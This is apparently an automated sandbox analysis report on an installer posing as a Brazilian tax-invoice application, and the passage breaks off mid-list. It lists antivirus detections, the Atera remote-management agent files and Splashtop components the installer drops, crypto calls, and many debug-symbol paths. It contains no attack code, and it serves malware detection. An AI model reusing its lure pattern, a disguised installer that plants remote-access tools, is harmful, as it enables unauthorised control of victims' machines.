                                No Suricata rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: 692c48.rbf (copy)ReversingLabs: Detection: 26%
                                Source: 692c48.rbf (copy)Virustotal: Detection: 27%Perma Link
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeReversingLabs: Detection: 26%
                                Multi AV Scanner detection for submitted file
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiVirustotal: Detection: 18%Perma Link
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiReversingLabs: Detection: 23%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F4E20 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash,35_2_00007FFDEE3F4E20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F4DE0 CryptReleaseContext,35_2_00007FFDEE3F4DE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F4BC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,35_2_00007FFDEE3F4BC0
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA NetworksJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgentJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.configJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\AteraSetupLog.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.Signaler.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000015.00000002.1983854282.0000015E7D2E2000.00000002.00000001.01000000.00000018.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2972609455.00000153FD172000.00000002.00000001.01000000.00000049.sdmp, AgentPackageSystemTools.exe, 00000039.00000002.2534525146.0000025FBFA22000.00000002.00000001.01000000.0000003D.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.PDB~ source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbd source: AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2089230351.000001F71D202000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdbSHA256G source: AgentPackageInternalPoller.exe, 0000002F.00000002.2462648805.0000022B9AFD2000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net6.0-Release/System.Diagnostics.EventLog.pdbSHA256 source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb'` source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: dows\dll\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdbSHA256 source: AgentPackageInternalPoller.exe, 0000002F.00000002.2469228610.0000022B9B262000.00000002.00000001.01000000.0000003B.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000D.00000002.2387388686.0000021C5B7C2000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\AgentPackageProgramManagement\obj\Release\AgentPackageProgramManagement.pdb source: AgentPackageProgramManagement.exe, 00000031.00000000.2383010410.00000153FCB72000.00000002.00000001.01000000.0000002B.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\ThirdPartyPackageManager\obj\Release\ThirdPartyPackageManager.pdb source: AgentPackageProgramManagement.exe, 00000031.00000002.2972259017.00000153FD142000.00000002.00000001.01000000.00000048.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2121847916.000001F735C42000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\SRUnPackFile.pdb source: SplashtopStreamer.exe, 00000038.00000000.2464305472.000000000042E000.00000002.00000001.01000000.00000039.sdmp, SplashtopStreamer.exe, 00000038.00000002.2597319611.000000000042E000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbSIK source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\AlphaControlAgentInstallation.pdbpdbion.pdb source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.Signaler.pdbSHA256 source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdbTlnl `l_CorExeMainmscoree.dll source: AgentPackageTicketing.exe, 0000002C.00000000.2361394254.00000214714D2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2784658706.000002203A692000.00000002.00000001.01000000.00000044.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.dr
                                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/Release/net8.0/System.ServiceProcess.ServiceController.pdbSHA256~ source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp
                                Source: Binary string: C:\buildAgent\work\1b72bc6dac87fa71\code_drop\merge\chocolatey.pdb source: AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System.pdb source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdbSHA256`{f source: AgentPackageMonitoring.exe, 00000023.00000002.2089230351.000001F71D202000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000015.00000002.1983854282.0000015E7D2E2000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: PC:\Windows\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2012\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2166826373.00007FFDEE53A000.00000002.00000001.01000000.0000001E.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2939724800.00007FFDF08CC000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/netstandard2.0-Release/Microsoft.Extensions.Configuration.Abstractions.pdb source: Microsoft.Extensions.Configuration.Abstractions.dll0.26.dr
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.pdb8 source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration/netstandard2.0-Release/Microsoft.Extensions.Configuration.pdbSHA256o source: Microsoft.Extensions.Configuration.dll0.26.dr
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdbSHA256 source: AgentPackageMonitoring.exe, 00000023.00000002.2121847916.000001F735C42000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.DiagnosticSource/net45-Release/System.Diagnostics.DiagnosticSource.pdb source: AgentPackageSystemTools.exe, 00000039.00000002.2536132761.0000025FBFA42000.00000002.00000001.01000000.0000003E.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb8 source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1718405720.000001779DAC2000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: rundll32.exe, 00000037.00000002.2574650690.00000000072C4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/Release/net8.0/System.ServiceProcess.ServiceController.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: n\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000037.00000002.2569972227.0000000000857000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdbp+ source: AgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: System.Threading.Tasks.dll.26.dr
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdbSHA256 source: System.Buffers.dll.26.dr
                                Source: Binary string: dows\dll\mscorlib.pdbp source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Deserialize39d51241-3394-4768-bd65-23be6a91f1ddonitoring.pdbpdbing.pdb source: AgentPackageMonitoring.exe, 0000003C.00000002.2790839667.0000029E3B5E9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb8 source: AgentPackageProgramManagement.exe, 00000031.00000002.2972609455.00000153FD172000.00000002.00000001.01000000.00000049.sdmp
                                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\21\obj\Microsoft.ApplicationInsights\Release\src\Microsoft.ApplicationInsights\net45\Microsoft.ApplicationInsights.pdb source: AgentPackageSystemTools.exe, 00000039.00000002.2542820315.0000025FD8322000.00000002.00000001.01000000.00000040.sdmp
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1718405720.000001779DAC2000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageADRemote\AgentPackageADRemote\obj\Release\AgentPackageADRemote.pdb source: AteraAgent.exe, 0000001A.00000002.2905094619.00000216492D7000.00000004.00000020.00020000.00000000.sdmp, AgentPackageADRemote.exe.26.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageInternalPoller\AgentPackageInternalPoller\obj\Release\AgentPackageInternalPoller.pdb source: AgentPackageInternalPoller.exe, 0000002F.00000000.2379668284.0000022B81DC2000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000D.00000002.2387388686.0000021C5B7C2000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb& source: rundll32.exe, 00000037.00000002.2574650690.00000000072C4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileProviders.Abstractions/Release/net8.0/Microsoft.Extensions.FileProviders.Abstractions.pdb source: Microsoft.Extensions.FileProviders.Abstractions.dll0.26.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2125952751.000001F735E52000.00000002.00000001.01000000.00000025.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\code\dapper-dot-net\Dapper\bin\Release\net45\Dapper.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2122915636.000001F735CD2000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net6.0-Release/System.Diagnostics.EventLog.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\System.pdbB5L source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdb source: System.Buffers.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdbb source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: System.Dynamic.Runtime.dll.26.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1984126068.000002156C344000.00000002.00000001.01000000.00000019.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, Newtonsoft.Json.dll1.13.dr
                                Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp
                                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdbSHA256~ source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1984126068.000002156C344000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2125952751.000001F735E52000.00000002.00000001.01000000.00000025.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, 